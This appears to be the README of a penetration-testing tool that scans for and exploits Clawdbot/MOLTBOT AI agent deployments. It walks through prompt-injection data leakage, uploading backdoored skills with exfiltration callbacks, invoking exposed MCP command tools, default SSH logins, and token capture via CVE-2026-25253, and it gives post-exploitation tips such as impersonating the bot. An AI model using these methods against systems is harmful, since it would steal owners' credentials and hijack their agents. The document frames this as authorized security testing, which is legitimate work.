clawdbot_scanner · ek0mssavi0r

readme

<h1 align="center">Clawdbot_Scanner</h1> Clawdbot / MOLTBOT Vulnerability Scanner & Exploitation Tool <img src="https://img.shields.io/badge/ek0ms%20savi0r-white.svg" alt="ek0ms_savi0r"> A comprehensive, interactive security assessment tool for Clawdbot and MOLTBOT instances. This scanner automates the discovery and exploitation of common vulnerabilities including exposed admin interfaces, prompt injection, credential exposure, malicious skills, SSH vulnerabilities, MCP (Model Context Protocol) detection, and CVE-2026-25253. <h2 align="center">Features</h2> Service Discovery - Automatically finds Clawdbot instances on a network • Scans for port 18789/tcp (Clawdbot control interface) • Detects SSH services on port 22/tcp • mDNS service discovery for Clawdbot instances • Banner grabbing and service identification SSH Vulnerability Assessment • Tests default credentials against SSH services • Checks for vulnerable OpenSSH versions • Identifies weak cipher algorithms • Interactive shell access when credentials are found Exposed Administrative Interfaces • Scans for common admin panels and dashboards • Tests default credentials • Attempts remote command execution Prompt Injection Testing • Tests AI/chat endpoints for injection vulnerabilities • Detects sensitive data leakage • Identifies command execution vectors Credential Exposure • Scans for exposed configuration files • Extracts API keys, passwords, and tokens • Discovers SSH private keys Malicious Skills/Extensions • Identifies skill management endpoints • Attempts to upload malicious skills • Sets up callbacks for data exfiltration MCP (Model Context Protocol) Detection • Detects MCP endpoints using JSON-RPC probing • Lists available tools and resources • Flags dangerous or sensitive tools/resources • Interactive tool invocation and resource reading CVE-2026-25253 Exploitation • Tests for WebSocket token leakage vulnerability • Redirects bot connections to attacker-controlled server • Captures authentication tokens <h2 align="center">Installation</h2> Clone the repository: <code>git clone https://github.com/ekomsSavior/clawdbot_scanner.git</code> <code>cd clawdbot_scanner</code> Install dependencies: <code>sudo apt update</code> <code>sudo apt install python3-pip avahi-utils -y</code> <code>pip3 install requests paramiko --break-system-packages</code> Make the script executable: <code>chmod +x clawdbot_scanner.py</code> <h2 align="center">How to Run the Tool</h2> <code>python3 clawdbot_scanner.py</code> <h2 align="center">What the Tool Does (Step by Step)</h2> Phase 1: Service Discovery (Module 0) The tool will first ask how you want to discover targets: • Single host - Scan one specific IP address • Network range - Scan a subnet (e.g., 192.168.1.0/24) • Import from file - Load targets from a text file It will then scan for: • Port 18789/tcp (Clawdbot HTTP control interface) • Port 22/tcp (SSH services) • Additional ports like 80, 443, 8080, 8443 • mDNS services advertising Clawdbot instances Phase 2: Target Selection After discovery, the tool will show you all found hosts and their open ports. You can choose to scan: • All discovered hosts • Only confirmed Clawdbot instances • Specific hosts by number Phase 3: SSH Vulnerability Assessment (Module 1) For hosts with port 22 open, the tool will: • Grab SSH banners and check for vulnerable versions • Test default credentials against SSH (root/root, admin/admin, etc.) • Check for weak cipher algorithms • Report any findings with severity levels (CRITICAL, HIGH, MEDIUM, INFO) Phase 4: HTTP Interface Scanning (Modules 2-7) For hosts with web interfaces, the tool will scan for: Module 2: Exposed Admin Interfaces • Scans for common admin panels and dashboards • Tests default credentials • Attempts remote command execution Module 3: Prompt Injection • Tests AI/chat endpoints for injection vulnerabilities • Detects sensitive data leakage • Identifies command execution vectors Module 4: Credential Exposure • Scans for exposed configuration files • Extracts API keys, passwords, and tokens • Discovers SSH private keys Module 5: Malicious Skills/Extensions • Identifies skill management endpoints • Attempts to upload malicious skills • Sets up callbacks for data exfiltration Module 6: MCP Detection • Probes common MCP endpoints with JSON-RPC requests • Lists available tools and resources • Flags dangerous tools (exec, shell, system) and sensitive resources • Interactive exploitation with tool invocation and resource reading Module 7: CVE-2026-25253 • Tests for WebSocket token leakage vulnerability • Redirects bot connections to attacker-controlled server • Captures authentication tokens Phase 5: Exploitation For each vulnerability found, the tool will ask if you want to attempt exploitation: • Admin interfaces - Tries default passwords, then attempts RCE • Prompt injection - Sends payloads to leak sensitive data • Exposed credentials - Extracts and saves API keys, passwords, SSH keys • Malicious skills - Attempts to upload backdoor skills • MCP - Allows interactive tool invocation and resource reading • CVE-2026-25253 - Redirects WebSocket connections to your listener • SSH - Opens interactive shells when credentials are found <h2 align="center">What to Expect During Scanning</h2> Prompts You'll See <code>Enter target IP or domain [192.168.1.100]:</code> <code>Use HTTPS? (y/n): n</code> <code>Enter port (default is 18789 for Clawdbot) [18789]:</code> Discovery Results <code>[*] Host: 192.168.1.105</code> <code> - Port 18789/HTTP [CLAWDBOT]</code> <code> Banner: HTTP/1.1 200 OK - Server: Clawdbot/1.2.3</code> <code> - Port 22/SSH</code> <code> Banner: SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.7</code> MCP Detection Results <code>Testing: http://192.168.1.105:18789/api/mcp</code> <code> Potential MCP endpoint: http://192.168.1.105:18789/api/mcp</code> <code> [ℹ] Response: {'id': 1, 'result': None, 'error': None, 'jsonrpc': '2.0'}</code> <code> Found 3 tools:</code> <code> - execute_command: Run system commands</code> <code> - read_file: Read files from the system</code> <code> - list_directory: List directory contents</code> Vulnerability Findings <code>[CRITICAL] Default SSH Credentials: Successfully authenticated with root:root</code> <code>[HIGH] Vulnerable SSH Version: Version 7.6 may be vulnerable to CVE-2018-15473</code> <code>[HIGH] Dangerous MCP Tool: Tool 'execute_command' may allow command execution</code> <code>! FOUND: http://192.168.1.105:18789/admin (200 OK) - EXPOSED!</code> Exploitation Options <code>[1] Attempt to exploit admin interfaces? (y/n): y</code> <code>[2] Attempt prompt injection attacks? (y/n): y</code> <code>[3] Use exposed credentials? (y/n): y</code> <code>[4] Upload malicious skills? (y/n): y</code> <code>[5] Exploit MCP endpoints? (y/n): y</code> <code>[6] Exploit CVE-2026-25253? (y/n): y</code> MCP Exploitation <code>Select tool number to invoke (or 0 to skip): 1</code> <code>Does this tool require arguments? (y/n): y</code> <code>Enter arguments as JSON (e.g., {"cmd":"ls"}): {"cmd":"id"}</code> <code>Tool invocation successful!</code> <code>{</code> <code> "result": "uid=0(root) gid=0(root) groups=0(root)"</code> <code>}</code> <h2 align="center">What to Do With the Results</h2> Files Created • leaked_data.txt - Contains any sensitive data extracted from successful prompt injections • credentials_found.txt - Stores all discovered credentials (API keys, passwords, SSH keys) Listeners to Set Up For certain exploits, you'll need to start listeners on your attacker machine: For HTTP exfiltration (port 8080): <code>nc -lvnp 8080</code> For reverse shells (port 4444): <code>nc -lvnp 4444</code> For WebSocket token capture (port 8080): <code>python3 -m websocket-server --port 8080</code> Post-Exploitation • Use captured credentials to access other services • Leverage SSH access to explore the filesystem • Use admin panel access to modify bot behavior • Invoke MCP tools to execute commands or read files • Extract tokens from CVE-2026-25253 to impersonate the bot <h2 align="center">Example Session Walkthrough</h2> <code>$ python3 clawdbot_scanner.py</code> <code>============================================================</code> <code> MODULE 0: Clawdbot Service Discovery</code> <code>============================================================</code> <code>Choose scan method: (1) Single host, (2) Network range, (3) Import from file [1]: 2</code> <code>Enter network range (e.g., 192.168.1.0/24): 192.168.1.0/24</code> <code>[*] Scanning 192.168.1.0/24 for Clawdbot instances...</code> <code> Testing 192.168.1.105:18789... </code> <code> Found: 192.168.1.105:18789 (HTTP)</code> <code> Testing 192.168.1.110:22...</code> <code> [*] Found SSH on 192.168.1.110:22</code> <code>============================================================</code> <code> DISCOVERED SERVICES</code> <code>============================================================</code> <code>[*] Host: 192.168.1.105</code> <code> - Port 18789/HTTP [CLAWDBOT]</code> <code> - Port 22/SSH</code> <code>[?] Which hosts would you like to scan? </code> <code> 1. All discovered hosts</code> <code> 2. Only Clawdbot instances</code> <code> 3. Select specific hosts</code> <code>Choose option [1]: 1</code> <code>============================================================</code> <code> SSH VULNERABILITY ASSESSMENT: 192.168.1.105:22</code> <code>============================================================</code> <code> SSH service is accessible</code> <code> SSH Banner: SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.7</code> <code> Testing default SSH credentials...</code> <code> SUCCESS! Logged in with root:root</code> <code>============================================================</code> <code> MODULE 6: MCP (Model Context Protocol) Detection</code> <code>============================================================</code> <code> Testing: http://192.168.1.105:18789/api/mcp</code> <code> Potential MCP endpoint: http://192.168.1.105:18789/api/mcp</code> <code> [ℹ] Response: {'id': 1, 'result': None, 'error': None, 'jsonrpc': '2.0'}</code> <code> Found 3 tools:</code> <code> - execute_command: Run system commands</code> <code> - read_file: Read files from the system</code> <code> - list_directory: List directory contents</code> <h2 align="center">Disclaimer</h2> This software is provided for educational and authorized security testing purposes only. The author assumes no liability and is not responsible for any misuse or damage caused by this program. By using this software, you agree to use it responsibly and in compliance with all applicable laws and regulations. <img width="400" alt="Clawdbot Scanner Art" src="https://github.com/user-attachments/assets/6937c37e-d490-4e6a-bf39-1888c0c133e8">

source code

files

viewer

select a file

// click a file to view source

license

MIT License Copyright (c) 2026 ek0mssavi0r Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. USE AT YOUR OWN RISK. NO WARRANTY PROVIDED.